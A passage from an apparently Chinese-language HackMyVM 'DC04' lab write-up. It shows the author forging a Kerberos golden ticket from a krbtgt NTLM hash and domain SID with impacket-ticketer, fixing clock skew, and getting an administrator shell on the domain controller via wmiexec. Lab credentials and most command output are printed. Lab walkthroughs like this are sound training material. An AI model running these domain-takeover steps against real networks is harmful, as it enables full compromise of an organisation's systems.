\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ netexec ldap $IP -u krbtgt -H 0f55cdc40bd8f5814587f7e6b2f85e6f\n[*] Initializing LDAP protocol database\nLDAP 192.168.10.101 389 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:SOUPEDECODE.LOCAL)\nLDAP 192.168.10.101 389 DC01 [-] SOUPEDECODE.LOCAL\\krbtgt:0f55cdc40bd8f5814587f7e6b2f85e6f STATUS_ACCOUNT_DISABLED<\/code><\/pre>\n\n- \u8868\u660e
krbtgt<\/code> \u8d26\u6237\u5728 Active Directory \u4e2d\u88ab\u7981\u7528\uff0c\u4f46\u662f\u5b58\u5728\u7684\u3002<\/li>\n<\/ul>\n\u751f\u6210\u9ec4\u91d1\u7968\u636e<\/h3>\n
\u9996\u5148\u9700\u8981\u751f\u6210DOMAIN<\/code>\u7684SID<\/code><\/p>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ impacket-lookupsid websvc:hgbepass@$IP \nImpacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies \n\n[*] Brute forcing SIDs at 192.168.10.101\n[*] StringBinding ncacn_np:192.168.10.101[\\pipe\\lsarpc]\n[*] Domain SID is: S-1-5-21-2986980474-46765180-2505414164\n------------------<\/code><\/pre>\n\u7136\u540e\u5c31\u662f\u53c2\u8003\u5927\u4f6c\u7684wp\u4e86\uff1a<\/p>\n
\/etc\/krb5.conf<\/h4>\n
\u9700\u8981\u5148\u8bbe\u7f6e\u4e00\u4e0b\u914d\u7f6e\u6587\u4ef6\uff1a\/etc\/krb5.conf<\/code>:<\/p>\n[libdefaults]\n default_realm = SOUPEDECODE.LOCAL\n dns_lookup_kdc = true\n\n[realms]\n SOUPEDECODE.LOCAL = {\n kdc = dc01.soupedecode.local\n admin_server = dc01.soupedecode.local\n }\n[domain_realm]\n soupedecode.local = SOUPEDECODE.LOCAL\n .soupedecode.local = SOUPEDECODE.LOCAL<\/code><\/pre>\n\u6267\u884c\u7279\u5b9a\u811a\u672c<\/h4>\n# sudo apt install ntpsec-ntpdate\nIP=192.168.10.101\nsudo ntpdate -u $IP\nimpacket-ticketer -nthash 0f55cdc40bd8f5814587f7e6b2f85e6f -domain-sid S-1-5-21-2986980474-46765180-2505414164 -domain soupedecode.local administrator\nexport KRB5CCNAME=administrator.ccache\nKRB5CCNAME=administrator.ccache evil-winrm -i $IP -u administrator -r soupedecode.local<\/code><\/pre>\n\u4f46\u662f\u6267\u884c\u5931\u8d25\u4e86\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ .\/exp.sh \n2025-06-13 19:57:16.465238 (-0400) +54001.739300 +\/- 0.000713 192.168.10.101 s1 no-leap\nCLOCK: time stepped by 54001.739300\nImpacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies \n\n[*] Creating basic skeleton ticket and PAC Infos\n[*] Customizing ticket for soupedecode.local\/administrator\n[*] PAC_LOGON_INFO\n[*] PAC_CLIENT_INFO_TYPE\n[*] EncTicketPart\n[*] EncAsRepPart\n[*] Signing\/Encrypting final ticket\n[*] PAC_SERVER_CHECKSUM\n[*] PAC_PRIVSVR_CHECKSUM\n[*] EncTicketPart\n[*] EncASRepPart\n[*] Saving ticket in administrator.ccache\n\nEvil-WinRM shell v3.7\n\nWarning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline\n\nData: For more information, check Evil-WinRM GitHub: https:\/\/github.com\/Hackplayers\/evil-winrm#Remote-path-completion\n\nWarning: User is not needed for Kerberos auth. Ticket will be used\n\nInfo: Establishing connection to remote endpoint\n\nError: An error of type GSSAPI::GssApiError happened, message is gss_init_sec_context did not return GSS_S_COMPLETE: Unspecified GSS failure. Minor code may provide more information\nCannot contact any KDC for realm 'SOUPEDECODE.LOCAL'\n\nError: Exiting with code 1<\/code><\/pre>\n\u5c1d\u8bd5\u6362\u4e00\u4e2akali<\/code>\u518d\u8bd5\u4e00\u4e0b\uff0c\u4f46\u662f\u53d1\u73b0\u4f9d\u7136\u51fa\u73b0\u4e0a\u8ff0\u95ee\u9898\u3002\u3002\u3002\u3002\u7136\u540e\u6309\u7167\u535a\u5ba2\u4e09\u8fdb\u884c\u64cd\u4f5c\u89e3\u51b3\u4e86\u8fd9\u4e00\u95ee\u9898\uff1a<\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC04]\n\u2514\u2500$ sudo rdate -n 192.168.10.101 \nimpacket-ticketer -nthash 0f55cdc40bd8f5814587f7e6b2f85e6f -domain-sid S-1-5-21-2986980474-46765180-2505414164 -domain soupedecode.local administrator\nexport KRB5CCNAME=administrator.ccache\nimpacket-wmiexec soupedecode.local\/administrator@dc01.soupedecode.local -k -target-ip 192.168.10.101\nFri Jun 13 20:27:16 EDT 2025\nImpacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies \n\n[*] Creating basic skeleton ticket and PAC Infos\n[*] Customizing ticket for soupedecode.local\/administrator\n[*] PAC_LOGON_INFO\n[*] PAC_CLIENT_INFO_TYPE\n[*] EncTicketPart\n[*] EncAsRepPart\n[*] Signing\/Encrypting final ticket\n[*] PAC_SERVER_CHECKSUM\n[*] PAC_PRIVSVR_CHECKSUM\n[*] EncTicketPart\n[*] EncASRepPart\n[*] Saving ticket in administrator.ccache\nImpacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies \n\nPassword:\n[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC04]\n\u2514\u2500$ sudo systemctl stop systemd-timesyncd\nFailed to stop systemd-timesyncd.service: Unit systemd-timesyncd.service not loaded.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC04]\n\u2514\u2500$ date\nFri Jun 13 05:43:13 AM EDT 2025\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC04]\n\u2514\u2500$ sudo ntpdate -q 192.168.10.101 \n2025-06-13 20:28:41.432572 (-0400) +53096.984937 +\/- 0.000667 192.168.10.101 s1 no-leap\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC04]\n\u2514\u2500$ sudo date -s "2025-06-13 20:33:41"\nFri Jun 13 08:33:41 PM EDT 2025\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC04]\n\u2514\u2500$ sudo rdate -n 192.168.10.101 \nimpacket-ticketer -nthash 0f55cdc40bd8f5814587f7e6b2f85e6f -domain-sid S-1-5-21-2986980474-46765180-2505414164 -domain soupedecode.local administrator\nexport KRB5CCNAME=administrator.ccache\nimpacket-wmiexec soupedecode.local\/administrator@dc01.soupedecode.local -k -target-ip 192.168.10.101\nFri Jun 13 20:31:35 EDT 2025\nImpacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies \n\n[*] Creating basic skeleton ticket and PAC Infos\n[*] Customizing ticket for soupedecode.local\/administrator\n[*] PAC_LOGON_INFO\n[*] PAC_CLIENT_INFO_TYPE\n[*] EncTicketPart\n[*] EncAsRepPart\n[*] Signing\/Encrypting final ticket\n[*] PAC_SERVER_CHECKSUM\n[*] PAC_PRIVSVR_CHECKSUM\n[*] EncTicketPart\n[*] EncASRepPart\n[*] Saving ticket in administrator.ccache\nImpacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies \n\nPassword:\n[*] SMBv3.0 dialect used\n[!] Launching semi-interactive shell - Careful what you execute\n[!] Press help for extra shell commands\nC:\\>whoami \/all\n\nUSER INFORMATION\n----------------\n\nUser Name SID \n=============================== ===========================================\nsoupedecode.local\\administrator S-1-5-21-2986980474-46765180-2505414164-500\n\nGROUP INFORMATION\n-----------------\n\nGroup Name Type SID Attributes \n================================================== ================ =========================================== ===============================================================\nEveryone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group \nBUILTIN\\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner\nBUILTIN\\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group \nBUILTIN\\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group \nNT AUTHORITY\\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group \nNT AUTHORITY\\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group \nNT AUTHORITY\\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group \nSOUPEDECODE\\Domain Admins Group S-1-5-21-2986980474-46765180-2505414164-512 Mandatory group, Enabled by default, Enabled group \nSOUPEDECODE\\Group Policy Creator Owners Group S-1-5-21-2986980474-46765180-2505414164-520 Mandatory group, Enabled by default, Enabled group \nSOUPEDECODE\\Schema Admins Group S-1-5-21-2986980474-46765180-2505414164-518 Mandatory group, Enabled by default, Enabled group \nSOUPEDECODE\\Enterprise Admins Group S-1-5-21-2986980474-46765180-2505414164-519 Mandatory group, Enabled by default, Enabled group \nSOUPEDECODE\\Denied RODC Password Replication Group Alias S-1-5-21-2986980474-46765180-2505414164-572 Mandatory group, Enabled by default, Enabled group, Local Group\nMandatory Label\\High Mandatory Level Label S-1-16-12288 \n\nPRIVILEGES INFORMATION\n----------------------\n\nPrivilege Name Description State \n========================================= ================================================================== =======\nSeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled\nSeMachineAccountPrivilege Add workstations to domain Enabled\nSeSecurityPrivilege Manage auditing and security log Enabled\nSeTakeOwnershipPrivilege Take ownership of files or other objects Enabled\nSeLoadDriverPrivilege Load and unload device drivers Enabled\nSeSystemProfilePrivilege Profile system performance Enabled\nSeSystemtimePrivilege Change the system time Enabled\nSeProfileSingleProcessPrivilege Profile single process Enabled\nSeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled\nSeCreatePagefilePrivilege Create a pagefile Enabled\nSeBackupPrivilege Back up files and directories Enabled\nSeRestorePrivilege Restore files and directories Enabled\nSeShutdownPrivilege Shut down the system Enabled\nSeDebugPrivilege Debug programs Enabled\nSeSystemEnvironmentPrivilege Modify firmware environment values Enabled\nSeChangeNotifyPrivilege Bypass traverse checking Enabled\nSeRemoteShutdownPrivilege Force shutdown from a remote system Enabled\nSeUndockPrivilege Remove computer from docking station Enabled\nSeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled\nSeManageVolumePrivilege Perform volume maintenance tasks Enabled\nSeImpersonatePrivilege Impersonate a client after authentication Enabled\nSeCreateGlobalPrivilege Create global objects Enabled\nSeIncreaseWorkingSetPrivilege Increase a process working set Enabled\nSeTimeZonePrivilege Change the time zone Enabled\nSeCreateSymbolicLinkPrivilege Create symbolic links Enabled\nSeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled\n\nUSER CLAIMS INFORMATION\n-----------------------\n\nUser claims unknown.\n\nKerberos support for Dynamic Access Control on this device has been disabled.\n\nC:\\>cd users\/administrator\/desktop\nC:\\users\\administrator\\desktop>ls\n'ls' is not recognized as an internal or external command,\noperable program or batch file.\n\nC:\\users\\administrator\\desktop>dir\n Volume in drive C has no label.\n Volume Serial Number is CCB5-C4FB\n\n Directory of C:\\users\\administrator\\desktop\n\n11\/07\/2024 12:08 PM <DIR> .\n06\/15\/2024 12:56 PM <DIR> ..\n11\/07\/2024 03:08 AM 32 root.txt\n 1 File(s) 32 bytes\n 2 Dir(s) 44,110,970,880 bytes free\n\nC:\\users\\administrator\\desktop>type root.txt\n1c66eabe105636d7e0b82ec1fa87cb7a\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC04]\n\u2514\u2500$ cat \/etc\/krb5.conf\n[libdefaults]\n default_realm = SOUPEDECODE.LOCAL\n\n[realms]\n SOUPEDECODE.LOCAL = {\n kdc = dc01.soupedecode.local\n admin_server = dc01.soupedecode.local\n }\n\n[domain_realm]\n soupedecode.local = SOUPEDECODE.LOCAL\n .soupedecode.local = SOUPEDECODE.LOCAL\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC04]\n\u2514\u2500$ tail -n 1 \/etc\/hosts\n192.168.10.101 soupedecode.local SOUPEDECODE.LOCAL<\/code><\/pre>\n\u65b0\u7684\u5bc6\u7801\u8fc7\u671f\u4fee\u6539\u65b9\u5f0f<\/h2>\n
\u5728\u7b2c\u4e09\u4e2a\u53c2\u8003wp\u53d1\u73b0\u4e86\u4e00\u79cd\u65b0\u7684\u5bc6\u7801\u8fc7\u671f\u4fee\u6539\u65b9\u5f0f\uff0c\u65e0\u9700\u6253\u5f00\u9776\u673a\u7ec8\u7aef\u8fdb\u884c\u64cd\u4f5c\uff1a<\/p>\n
netexec smb $IP -u websvc -p 'hgbepass' -M change-password -o NEWPASS='pass'<\/code><\/pre>\n\u4f46\u662f\u6211\u672c\u5730\u6ca1\u6709\u6210\u529f\uff0c\u663e\u793a\u6ca1\u8fd9\u4e2a\u6a21\u5757\u3002\u3002\u3002\u3002\u53ef\u80fd\u662f\u56e0\u4e3a\u8fd9\u4e2a\u6a21\u5757\u662f\u65b0\u4e0a\u7684\uff0c\u8fd8\u6ca1\u540c\u6b65\u5230kali\u7684\u8fd9\u4e2a\u6a21\u5757\u91cc\u53bb\uff01<\/p>\n
\u53c2\u8003<\/h2>\n
http:\/\/www.vxer.cn\/2024\/12\/10\/hackmyvm-dc04-walkthrough\/<\/a><\/p>\nhttps:\/\/sunsetaction.top\/2025\/04\/03\/HackMyVMDC04\/<\/a><\/p>\n
![\"image-20250613123713021\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506131757867.png\")
<\/div>![\"image-20250613123825455\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506131757868.png\")
<\/div><\/p>\n![\"image-20250613130840766\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506131757869.png\")
<\/div><\/p>\n![\"image-20250613140023354\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506131757870.png\")
<\/div>![\"image-20250613140230947\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506131757871.png\")
<\/div><\/p>\n![\"image-20250613142211313\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506131757872.png\")
<\/div><\/p>\n![\"image-20250613144609799\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506131757873.png\")
<\/div><\/p>\n![\"image-20250613144746197\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506131757874.png\")
<\/div><\/p>\n![\"image-20250613150516034\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506131757875.png\")
<\/div><\/p>\n![\"image-20250613153132360\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506131757876.png\")
<\/div><\/p>\n![\"image-20250613153619223\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506131757877.png\")
<\/div><\/p>\n![\"image-20250613163510490\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506131757878.png\")
<\/div><\/p>\n